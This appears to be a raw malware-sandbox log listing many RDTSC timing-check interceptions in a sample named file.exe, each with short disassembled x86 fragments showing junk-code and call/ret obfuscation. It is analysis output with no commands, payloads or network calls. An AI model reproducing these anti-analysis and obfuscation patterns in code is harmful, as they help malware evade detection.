Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4B3A8 second address: C4B3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4B3AC second address: C4B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F996107E1C4h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F996107E1C2h 0x00000017 jnc 00007F996107E1BCh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 pushad 0x00000021 push esi 0x00000022 pop esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4B46D second address: C4B471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4B471 second address: C4B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: C4B477 second address: C4B4BB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99607DC0C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F99607DC0D4h 0x00000012 mov dword ptr [ebp+122D1B70h], edx 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D213Fh], eax 0x00000020 mov dword ptr [ebp+122D1B70h], esi 0x00000026 push 28CE1880h 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F99607DC0C8h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B657 second address: C4B672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F996107E1C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B72F second address: C4B733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B733 second address: C4B737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B80E second address: C4B812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B812 second address: C4B862 instructions: 0x00000000 rdtsc 0x00000002 je 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ebx 0x0000000d jo 00007F996107E1B8h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnl 00007F996107E1C0h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 js 00007F996107E1B6h 0x00000029 popad 0x0000002a pop eax 0x0000002b pushad 0x0000002c sub dword ptr [ebp+122D1B75h], esi 0x00000032 add dword ptr [ebp+122D1B75h], edi 0x00000038 popad 0x00000039 lea ebx, dword ptr [ebp+1244D314h] 0x0000003f mov dword ptr [ebp+122D3702h], edx 0x00000045 mov edx, 469CBA0Bh 0x0000004a xchg eax, ebx 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B862 second address: C4B866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BED6 second address: C6BEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BEDE second address: C6BEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BEE3 second address: C6BF0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F996107E1D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6BF0C second address: C6BF10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C771 second address: C6C790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F996107E1B6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C790 second address: C6C79A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CAB5 second address: C6CAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6CE7C second address: C6CE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D08C second address: C6D09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F996107E1BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D09D second address: C6D0A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0A2 second address: C6D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D0C1 second address: C6D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399D5 second address: C399DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399DC second address: C399E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C399E1 second address: C39A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F996107E1C2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A02 second address: C39A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A08 second address: C39A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A0C second address: C39A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C39A12 second address: C39A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D228 second address: C6D22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D22E second address: C6D23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F996107E1B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D23D second address: C6D241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D241 second address: C6D258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F996107E1BCh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DAC6 second address: C6DACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DC5B second address: C6DC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F996107E1B6h 0x0000000a popad 0x0000000b jns 00007F996107E1B8h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 js 00007F996107E1B6h 0x0000001a jnl 00007F996107E1B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704DF second address: C704EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C704EC second address: C704F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F5E9 second address: C6F5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F99607DC0C6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F5FE second address: C6F603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70796 second address: C7079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7079A second address: C707A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C707A0 second address: C707AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F99607DC0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708F3 second address: C708F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708F7 second address: C708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C708FD second address: C7090F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F996107E1B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D14 second address: C74D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0CEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99607DC0CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D35 second address: C74D43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D43 second address: C74D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D47 second address: C74D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F996107E1D2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74D55 second address: C74D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99607DC0D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77F8D second address: C77F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C77F93 second address: C77F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C783E1 second address: C783F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F996107E1B6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78561 second address: C78580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 pushad 0x0000000a jmp 00007F99607DC0D3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BB88 second address: C7BB8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD08 second address: C7BD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BD0C second address: C7BD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C1E3 second address: C7C1E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C305 second address: C7C309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C799 second address: C7C79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C79D second address: C7C7A3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C7A3 second address: C7C7B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CAE0 second address: C7CAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB7B second address: C7CB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB7F second address: C7CB85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CB85 second address: C7CB9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99607DC0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jns 00007F99607DC0C6h 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CCDF second address: C7CD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F996107E1BCh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F996107E1B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov si, 9544h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pushad 0x00000030 popad 0x00000031 pop esi 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC23 second address: C7DC29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC29 second address: C7DC3C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F996107E1B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC3C second address: C7DC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC40 second address: C7DC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DC46 second address: C7DC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99607DC0CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ECFF second address: C7ED25 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F996107E1BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F996107E1BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F996107E1B6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ED25 second address: C7ED29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82403 second address: C82407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82407 second address: C82486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F99607DC0C8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D39DBh], ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F99607DC0C8h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov edi, dword ptr [ebp+122D30F9h] 0x0000004d jmp 00007F99607DC0CDh 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F99607DC0D7h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pop eax 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8428C second address: C84291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84291 second address: C842B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F99607DC0C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99607DC0D7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C84865 second address: C848CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F996107E1B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov bx, cx 0x00000024 push 00000000h 0x00000026 sub dword ptr [ebp+1244DD7Bh], ebx 0x0000002c mov edi, 1ABCB362h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F996107E1B8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D17F6h], esi 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C848CB second address: C848D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C857FA second address: C857FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85958 second address: C85973 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99607DC0C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F99607DC0CCh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85973 second address: C8597D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F996107E1BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8597D second address: C85A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or di, 631Fh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F99607DC0C8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D2DD9h], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a mov di, cx 0x0000003d push ebx 0x0000003e mov di, 2B00h 0x00000042 pop edi 0x00000043 mov eax, dword ptr [ebp+122D0211h] 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F99607DC0C8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2AABh] 0x00000069 ja 00007F99607DC0C9h 0x0000006f push FFFFFFFFh 0x00000071 jl 00007F99607DC0CFh 0x00000077 pushad 0x00000078 cld 0x00000079 xor dword ptr [ebp+122D2491h], ebx 0x0000007f popad 0x00000080 nop 0x00000081 push eax 0x00000082 push edx 0x00000083 jmp 00007F99607DC0D7h 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C85A28 second address: C85A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8AB40 second address: C8AB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8878E second address: C887B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F996107E1C4h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C887B1 second address: C887B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C887B7 second address: C887C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F996107E1B6h 0x0000000a rdtsc
